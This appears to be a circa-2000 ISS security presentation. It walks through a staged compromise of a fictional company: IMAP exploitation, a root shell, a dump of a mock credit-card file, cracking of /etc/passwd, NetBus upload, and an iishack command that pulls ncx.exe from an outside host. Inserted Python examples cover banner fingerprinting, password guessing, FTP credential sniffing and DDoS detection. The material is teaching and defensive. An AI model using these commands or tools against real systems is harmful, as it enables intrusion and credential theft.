The Anatomy of a Web Attack John Rezabek Technical Product Manager jrezabek@iss.net.

Post on 30-Dec-2015


The Anatomy of a Web Attack

John Rezabek, Technical Product Manager

jrezabek@iss.net

Agenda

• Methods of Attacks

• The Research

• The Break In

• Re-designing Web Sites

• DDOS – The New Threat

• Minimizing Threat Management

• Q & A

Methods of Attack

• Denial of Service – SYN flood, ping of death, teardrop, etc.

• Unauthorized Access – Back Orifice, NetBus, DNS overflow, Crack

• Pre-attack Probes – port scan, SATAN

• Suspicious Activity – IP unknown protocol

• Protocol Decodes – NetBIOS session request, IRC

The Research ….

bigwidget.com

Registrant:
BigWidget, Conglomerated. (BWC2-DOM)
1234 Main Street
Anytown, GA
USA

Domain Name: BIGWIDGET.COM

Administrative Contact, Technical Contact, Zone Contact:
BigWidget Admin (IA338-ORG) bwc-dnsadmin@bigwidget.com
Phone: 678-555-1212 Fax: 678-555-1211

Billing Contact:
BigWidget Billing (IB158-ORG) BigWidget-billing@bigwidget.com
Phone: 678-555-1212 Fax: 678-555-1211

Record last updated on 29-Jun-98.
Record created on 30-Jun-94.
Database last updated on 13-Oct-98 06:21:01 EDT.

Domain servers in listed order:
EHECATL.BIGWIDGET 208.21.0.7
NS1.SPRINTLINK.NET 204.117.214.10
NS.COMMANDCORP.COM 130.205.70.10

The Break in ….

hacker:~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com.
Escape character is '^]'.
Connection closed by foreign host.

hacker:~$ telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU)
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
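The two telnet sessions above are banner grabbing: the attacker connects, types nothing, and reads what the service volunteers. The IMAP greeting hands over the product (UW imapd, identified by the MRC@CAC.Washington.EDU contact line), the exact build, and the host name; that version string is what the next slide's exploit is chosen against. The following is an added example, not code from the slides or from ISS, that does the same thing programmatically and turns the greeting into a structured fingerprint. The regexes are assumptions about the UW imapd and Sendmail greeting layouts; the Sendmail sample is constructed, the IMAP sample is the line shown on the slide.

```python
"""Service fingerprinting from greeting banners (added example)."""
import re
import socket
from dataclasses import dataclass
from typing import Optional

# UW imapd greeting, as on the slide:
# "* OK bigwidget IMAP4rev1 Service 9.0(157) at <date> (Report problems in this server to MRC@CAC.Washington.EDU)"
IMAP_GREETING = re.compile(
    r"^\*\s+(?P<status>OK|PREAUTH)\s+(?P<host>\S+)\s+"
    r"(?P<product>IMAP4rev1|IMAP4)\s+(?:Service|Server)\s+(?P<version>\S+)"
    r"(?:\s+at\s+(?P<date>.*?))?\s*(?:\((?P<contact>Report problems[^)]*)\))?$"
)
# Typical Sendmail greeting (assumed layout): "220 host ESMTP Sendmail 8.8.7/8.8.7; <date>"
SMTP_GREETING = re.compile(r"^220[ -](?P<host>\S+)\s*(?P<software>.*)$")


@dataclass
class Fingerprint:
    service: str
    host: Optional[str]
    product: Optional[str]
    version: Optional[str]
    contact: Optional[str]
    raw: str

    @property
    def discloses_version(self) -> bool:
        """An exact version string is what lets an attacker pick a matching exploit."""
        return self.version is not None


def fingerprint_banner(port: int, banner: str) -> Optional[Fingerprint]:
    """Classify the first line a service sends. Returns None for a silent connection,
    which is what the slide's port 25 session shows (connect, no 220 line, close)."""
    line = banner.strip().splitlines()[0] if banner.strip() else ""
    if not line:
        return None
    if port == 143:
        m = IMAP_GREETING.match(line)
        if m:
            return Fingerprint("imap", m["host"], m["product"], m["version"], m["contact"], line)
        return Fingerprint("imap", None, None, None, None, line)
    if port == 25:
        m = SMTP_GREETING.match(line)
        if m:
            # Sendmail puts its name/version before the ';' and the date after it.
            software = m["software"].split(";")[0].strip() or None
            return Fingerprint("smtp", m["host"], software, None, None, line)
        return Fingerprint("smtp", None, None, None, None, line)
    return Fingerprint(f"tcp/{port}", None, None, None, None, line)


def grab_banner(host: str, port: int, timeout: float = 5.0) -> str:
    """Live equivalent of `telnet host 25` / `telnet host 143`: connect, read what the
    server volunteers, send nothing. Needs network access; the samples below are offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            return s.recv(1024).decode("ascii", "replace")
        except (socket.timeout, ConnectionResetError):
            return ""


# Samples: the IMAP line from the slide, and a constructed Sendmail greeting.
SAMPLE_IMAP = ("* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)"
               "(Report problems in this server to MRC@CAC.Washington.EDU)")
SAMPLE_SMTP = "220 mail.example.com ESMTP Sendmail 8.8.7/8.8.7; Wed, 14 Oct 1998 11:51:50 -0400"

if __name__ == "__main__":
    for port, banner in ((25, ""), (25, SAMPLE_SMTP), (143, SAMPLE_IMAP)):
        print(port, fingerprint_banner(port, banner))
```

The defensive reading of the same output: a service whose greeting carries an exact build number has told every scanner on the Internet which exploit to try; trimming the banner does not fix the bug behind it, but it removes the free lookup.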


hacker:~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius (aky@galeb.etf.bg.ac.yu)
Modifications: p1 (p1@el8.org)
Completed successfully.

hacker:~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
root

bigwidget:~# whoami
root
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1 localhost localhost.localdomain
208.21.2.10 thevault accounting
208.21.2.11 fasttalk sales
208.21.2.12 geekspeak engineering
208.21.2.13 people human resources
208.21.2.14 thelinks marketing
208.21.2.15 thesource web server

bigwidget:~# rlogin thevault
login:

thevault:~# cd /data/creditcards
thevault:~# cat visa.txt
Allan B. Smith     6543-2223-1209-4002  12/99
Donna D. Smith     6543-4133-0632-4572  06/00
Jim Smith          6543-2344-1523-5522  01/01
Joseph L. Smith    6543-2356-1882-7532  04/02
Kay L. Smith       6543-2398-1972-4532  06/03
Mary Ann Smith     6543-8933-1332-4222  05/01
Robert F. Smith    6543-0133-5232-3332  05/00

thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman   password: nambob
username: mary     password: mary
username: root     password: ncc1701

thevault:~# ftp thesource
Name: administrator
331 Password required for administrator.
Password: *******
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> cd \temp
250 CWD command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit

thevault:~$ telnet thesource
Trying 208.21.2.160...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: administrator
password: *******
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\> cd \temp
C:\TEMP> netbus.exe

[NetBus 1.6 (by cf) client window: connected to the.source.bigwidget.com; Screendump]

David Smith <dsmith@bigwidget.com>
President@bigwidget.com
My Raise <URGENT>

Dear Mr. Smith

I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.

Your Son,

Dave

David Smith

Anatomy of the Attack: BigWidget's Network

[Network diagram: router, UNIX firewall, UNIX e-mail server, NT web server, clients & workstations; the attack path is labelled imap (mail server), Crack (UNIX), NetBus (NT).]
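The `crack /etc/passwd` step in the break-in above is what turned one root shell into three more accounts: two passwords were derived from the username and one was a dictionary word, so they fell in seconds. The following is an added example, not Crack itself and not code from the slides, that reproduces the guessing strategy offline and pairs it with the control that would have stopped it. The hash is a salted PBKDF2 stand-in for crypt(3) (Python's crypt module is deprecated); the records, salts and the tiny wordlist are constructed to match the slide's result.

```python
"""Offline password audit reproducing the crack step (added example)."""
import hashlib
import secrets
from typing import Dict, Iterable, List, Sequence, Tuple

ITERATIONS = 1000  # low on purpose: the point is the guessing strategy, not the hash cost


def hash_password(password: str, salt: str) -> str:
    """Stand-in for the crypt(3) hash stored in /etc/passwd or /etc/shadow."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ITERATIONS).hex()


def make_record(user: str, password: str) -> Tuple[str, str, str]:
    """(user, salt, digest). Only used to build the sample; a real audit reads the file."""
    salt = secrets.token_hex(4)
    return user, salt, hash_password(password, salt)


# Constructed to match the slide's result: bobman/nambob, mary/mary, root/ncc1701.
SAMPLE_RECORDS: List[Tuple[str, str, str]] = [
    make_record("bobman", "nambob"),
    make_record("mary", "mary"),
    make_record("root", "ncc1701"),
]

# Tiny wordlist. Crack ships far larger ones; "ncc1701" is a classic entry.
WORDLIST = ["password", "secret", "letmein", "ncc1701", "widget"]


def candidates_for(user: str, wordlist: Iterable[str]) -> List[str]:
    """Guesses in the order a cracker tries them: derived from the username first
    (that alone recovers 'mary' and 'nambob'), then the dictionary."""
    base = user.lower()
    derived = [base, base[::-1], base.capitalize(), base + "1", base + "123", base * 2]
    seen, out = set(), []
    for guess in list(derived) + list(wordlist):
        if guess not in seen:
            seen.add(guess)
            out.append(guess)
    return out


def crack(records: Sequence[Tuple[str, str, str]], wordlist: Iterable[str] = WORDLIST) -> Dict[str, str]:
    """Return {user: recovered password} for every record some guess matches."""
    wordlist = list(wordlist)
    found: Dict[str, str] = {}
    for user, salt, digest in records:
        for guess in candidates_for(user, wordlist):
            if hash_password(guess, salt) == digest:
                found[user] = guess
                break
    return found


def policy_violations(user: str, password: str) -> List[str]:
    """The matching control: reject at password-change time what crack recovers in seconds."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    low = password.lower()
    if low in (user.lower(), user.lower()[::-1]) or user.lower() in low:
        problems.append("derived from username")
    if low in WORDLIST:
        problems.append("in dictionary")
    return problems


if __name__ == "__main__":
    for user, pw in crack(SAMPLE_RECORDS).items():
        print(f"username: {user:8} password: {pw:10} violations: {policy_violations(user, pw)}")
```

Run as a periodic assessment, this is exactly the "perform periodic assessments" item on the closing slide: the defender runs the cracker before the attacker does, and the policy check keeps the same weak choices from coming back.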

Re-designing Web Sites: "Using a simple exploit"

hacker:~$ iishack www.bigwidget.com 80 www.hackbox.sk/ncx.exe
Data sent!

hacker:~$ telnet bigwidget.com 80
Trying 10.0.0.28...
Connected to bigwidget.com.
Microsoft (R) Windows NT (TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\> [You have full access to the system, happy browsing :)]
C:\> [Add a scheduled task to restart inetinfo in X minutes]
C:\> [Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\> [Clean up any trace or logs we might have left behind]
C:\> exit

Re-designing Web Sites: "Using a free Sniffer"

c:\> ftp webcentral
Connected to webcentral
220 webcentral Microsoft FTP Service (Version 4.0).
Name: jsmith
331 Password required for jsmith.
Password: *******
230 User jsmith logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 jsmith jsmith  1024 Aug 17 17:07 .
-rwxr-xr-x 9 root   root    1024 Aug 17 17:07 ..
-rwxr-xr-x 2 jsmith jsmith  2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 jsmith jsmith  1244 Aug 17 17:07 image1.gif
-rwxr-xr-x 2 jsmith jsmith 10244 Aug 17 17:07 image2.gif
-rwxr-x--x 6 jsmith jsmith   877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 jsmith jsmith  1314 Aug 17 17:07 bigwidget.jpg
-rwxr-xr-x 2 jsmith jsmith  1824 Aug 17 17:07 page2.html
226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)
ftp> send index.html
local: bigwedgie.html remote: index.html
200 PORT command successful.
150 Opening BINARY mode data connection for index.html
226 Transfer complete.
ftp> quit
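The only thing the attacker needed for the defacement above was jsmith's FTP password, and FTP sends it in cleartext, so anyone with a sniffer on the same segment reads it straight off the wire. The following is an added example, not from the slides, of what that sniffer's output yields once the control channel is reassembled: the parser walks the conversation, pairs each USER/PASS with the server's 230 or 530 verdict, and records what was uploaded. The capture is a constructed reassembly of the session shown; the password is invented (the slide prints only *******), and a failed first attempt is included to show how the verdicts are tracked.

```python
"""Credentials and uploads recovered from a sniffed FTP control channel (added example)."""
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Tuple

# (direction, line): "C" client -> server, "S" server -> client. Constructed.
SNIFFED: List[Tuple[str, str]] = [
    ("S", "220 webcentral Microsoft FTP Service (Version 4.0)."),
    ("C", "USER jsmith"),
    ("S", "331 Password required for jsmith."),
    ("C", "PASS widgets"),
    ("S", "530 User jsmith cannot log in."),
    ("C", "USER jsmith"),
    ("S", "331 Password required for jsmith."),
    ("C", "PASS w1dg3t!"),
    ("S", "230 User jsmith logged in."),
    ("C", "SYST"),
    ("S", "215 Windows_NT version 4.0"),
    ("C", "PORT 208,21,2,160,4,1"),
    ("S", "200 PORT command successful."),
    ("C", "STOR index.html"),
    ("S", "150 Opening BINARY mode data connection for index.html"),
    ("S", "226 Transfer complete."),
    ("C", "QUIT"),
    ("S", "221"),
]


@dataclass
class Session:
    server_banner: Optional[str] = None
    logins: List[Tuple[str, str, bool]] = field(default_factory=list)  # (user, password, succeeded)
    uploads: List[str] = field(default_factory=list)


def parse_control_channel(messages: Iterable[Tuple[str, str]]) -> Session:
    """Walk the conversation: USER/PASS pairs are confirmed by the server's 230 or 530,
    STOR is confirmed by 226. Everything here is cleartext on the wire, which is the point."""
    sess = Session()
    user: Optional[str] = None
    password: Optional[str] = None
    pending_store: Optional[str] = None
    for direction, line in messages:
        if direction == "C":
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user, password = arg, None
            elif verb == "PASS":
                password = arg
            elif verb == "STOR":
                pending_store = arg
        else:
            code = line[:3]
            if code == "220" and sess.server_banner is None:
                sess.server_banner = line[4:]
            elif code in ("230", "530") and user is not None:
                sess.logins.append((user, password or "", code == "230"))
                user = password = None
            elif code == "226" and pending_store is not None:
                sess.uploads.append(pending_store)
                pending_store = None
    return sess


def credentials(messages: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Just the (user, password) pairs the server accepted."""
    return [(u, p) for u, p, ok in parse_control_channel(messages).logins if ok]


if __name__ == "__main__":
    s = parse_control_channel(SNIFFED)
    print("server:", s.server_banner)
    print("accepted:", credentials(SNIFFED))
    print("uploaded:", s.uploads)
```

Feed it the text of a reassembled TCP stream (Wireshark's "Follow TCP Stream" or tcpflow output, split by direction) and it gives the same answer the attacker got. The fix is not a better parser on the defender's side; it is moving web content publishing off cleartext FTP onto an authenticated, encrypted channel.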

Real World Website Defacements

New York Times

Distributed Denial of Service

“The New Threat”

What is a DDoS Attack?

• In a Denial of Service (DoS) attack, the attacker overwhelms a targeted system with a flood of packets to deny availability of services to legitimate users

• In a Distributed Denial of Service (DDoS) attack, the attacker uses dozens or even hundreds of 'zombie' machines to multiply the force of the attack

Motives Behind DDoS Attacks

• Recent attacks appear to be motivated by:
– Desire for attention
– Notoriety
– Fun

• Long term, DDoS-type attacks could become motivated by:
– Economic warfare between competitors
– Disgruntled employees / customers
– Monetary gains (e.g. stock manipulation)
– Political sabotage and vandalism

Types of DDoS Attacks

• TFN (Tribal Flood Network)
• Trin00
• TFN2K (Tribal Flood Network 2K)
• Stacheldraht (Barbed Wire)
• New attack tools, announced 2/15/00:
– Fapi
– Shaft
– Trank

DDoS Components

• All DDoS attacks consist of three parts:
– Client program
– Master server
– Agent (zombie) program

DDoS Attack Illustrated

1. The hacker scans the Internet (using a scanning program) for unsecured systems that can be compromised.
2. The hacker secretly installs zombie agent programs, turning the unsecured computers into zombies.
3. The hacker selects a master server to send commands to the zombies.
4. Using the client program, the hacker sends commands to the master server to launch a zombie attack against a targeted system.
5. The master server sends the signal to the zombies to launch the attack on the targeted system.
6. The targeted system is overwhelmed by bogus requests that shut it down for legitimate users ("Request Denied").

Enterprise Risk Management / Enterprise Security Management

[Diagram: inputs are operating systems, applications, databases and networks; findings are policy violations, vulnerabilities and threats; outputs are alarms, corrective action, active response and actionable information.]

Vulnerability Management: corrective action report

Vulnerability: GetAdmin
Severity: High Risk
IP Address: 215.011.200.255
OS: Windows NT 4.0
Fix: From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.

Vulnerability Management

• Continued compliance to policy

• Unauthorized system changes

• New vulnerabilities

• Suspicious activity

• General ‘good practice’

Threat Management

[Flow diagram: external attack detected -> e-mail alert / log, record session, session terminated, reconfigure firewall / router; internal attack detected -> session logged.]

Threat Management

• Known network attacks

• Continued compliance to policy

• Unauthorized access

• Suspicious network activity

• General ‘good practice’
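The DDoS slides describe the attack's structure (client, master, zombies, target) and the Threat Management slides describe the response loop (alert and log, record the session, reconfigure the firewall or router). What is missing between them is the detection logic that connects the two, so here is an added example covering both passages; it is not code from the slides or from ISS. It works over flow records rather than raw packets: a flood is recognised by many distinct sources hitting one destination inside a short window, internal zombies are spotted by traffic on the tools' control ports, and each alert is turned into the response steps from the Threat Management flow. The flow records and thresholds are constructed. The control ports are the trin00 defaults reported in public analyses (master 27665/tcp, master-to-agent 27444/udp, agent-to-master 31335/udp); treating them as fixed is an assumption, since the tools can be rebuilt with other ports.

```python
"""Flood detection, zombie indicators and response steps over flow records (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set


@dataclass(frozen=True)
class Flow:
    ts: float     # seconds
    src: str
    dst: str
    proto: str    # "tcp", "udp" or "icmp"
    dport: int
    packets: int


# trin00 default control ports (assumption: unchanged defaults).
TRIN00_PORTS = {("tcp", 27665), ("udp", 27444), ("udp", 31335)}


def detect_flood(flows: Iterable[Flow], window: float = 10.0,
                 min_sources: int = 20, min_packets: int = 1000) -> List[Dict]:
    """Slide a time window over the flows to each destination and report the busiest
    window that exceeds both thresholds. Distinct sources separate a DDoS from one
    misbehaving client; packet volume separates it from a slow scan by many hosts."""
    by_dst: Dict[str, List[Flow]] = defaultdict(list)
    for f in sorted(flows, key=lambda f: f.ts):
        by_dst[f.dst].append(f)
    alerts = []
    for dst, fl in by_dst.items():
        best: Optional[Dict] = None
        start = 0
        for end in range(len(fl)):
            while fl[end].ts - fl[start].ts > window:
                start += 1
            win = fl[start:end + 1]
            sources = {f.src for f in win}
            packets = sum(f.packets for f in win)
            if (len(sources) >= min_sources and packets >= min_packets
                    and (best is None or len(sources) > best["sources"])):
                best = {"target": dst, "sources": len(sources), "packets": packets,
                        "t0": fl[start].ts, "t1": fl[end].ts}
        if best:
            alerts.append(best)
    return alerts


def find_zombie_candidates(flows: Iterable[Flow], internal_prefix: str) -> Set[str]:
    """'Ensure your computers are not zombies': internal hosts seen on DDoS control ports."""
    hosts: Set[str] = set()
    for f in flows:
        if (f.proto, f.dport) in TRIN00_PORTS:
            hosts.update(h for h in (f.src, f.dst) if h.startswith(internal_prefix))
    return hosts


def respond(alert: Dict) -> List[str]:
    """The Threat Management flow: alert/log, record the session, reconfigure the edge.
    Rate-limit the target rather than blocking sources: flood sources are many and often spoofed."""
    span = alert["t1"] - alert["t0"]
    return [
        f"EMAIL ALERT/LOG: {alert['sources']} sources sent {alert['packets']} packets "
        f"to {alert['target']} in {span:.1f}s",
        f"RECORD SESSION: start packet capture towards {alert['target']} for forensics",
        f"RECONFIGURE FIREWALL/ROUTER: rate-limit new connections to {alert['target']}; "
        f"ask the upstream provider to filter",
    ]


def sample_flows() -> List[Flow]:
    """Constructed: normal browsing, 40 zombies hitting the web server within 4 seconds,
    and one engineering host reporting to a master on 31335/udp."""
    flows = [Flow(0.0, "198.51.100.7", "208.21.2.15", "tcp", 80, 12),
             Flow(1.5, "198.51.100.8", "208.21.2.15", "tcp", 80, 9),
             Flow(50.0, "208.21.2.12", "203.0.113.9", "udp", 31335, 1)]
    flows += [Flow(100.0 + i * 0.1, f"192.0.2.{i + 1}", "208.21.2.15", "tcp", 80, 120)
              for i in range(40)]
    return flows


if __name__ == "__main__":
    for alert in detect_flood(sample_flows()):
        print("\n".join(respond(alert)))
    print("zombie candidates:", find_zombie_candidates(sample_flows(), "208.21.2."))
```

The thresholds are the part to tune per site: a window of ten seconds and twenty sources is far below what a real flood produces, so the cost of a low threshold is false alarms on a popular page rather than a missed attack. The zombie check is the one that matters for "prevent yourself from being victimized": it is the site's own hosts, not the eventual target, that show up on the control ports.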

Enterprise Security Risk Profile

[Chart over time built from vulnerability data, threat data, firewall/router logs and PKI/authentication data, plotting internal threats, vulnerabilities and external threats.]

Information Risk Management: Business Is Changing

Source: Forrester Research, Inc.

Yesterday (Internal Focus, Centralized Assets, Prevent Losses, IT Control):
• Access is granted to employees only
• Applications and data are centralized in fortified IT bunkers
• The goal of security is to protect against confidentiality breaches
• Security manager decides who gets access

Today (External Focus, Distributed Assets, Generate Revenue, Business Control):
• Suppliers, customers, and prospects all need some form of access
• Applications and data are distributed across servers, locations, and business units
• The goal of security is to enable eCommerce
• Business units want the authority to grant access

Minimizing Risk

• Prevent yourself from being victimized
– Ensure your computers are not zombies
– Perform periodic assessments via automated scanning services

• Implement an early warning system
– Automated intrusion detection & response tools
– Collect forensic data to prosecute hackers later

Additional Resources

• Secure e-Business White Paper: http://solutions.iss.net/products/whitepapers/securityebus.pdf

• What to do if you are attacked: http://www.iss.net/news/denial.php

• Technical information about DDoS attacks: http://xforce.iss.net/alerts/advise43.php3

• X-Force Security Risk Database:http://xforce.iss.net

• ISS Download Center: http://www.iss.net/eval/eval.php

• ISS White Papers: http://solutions.iss.net/products/whitepapers

Questions & Answers ?

Thank you for your time, for more information see www.iss.net

Thank You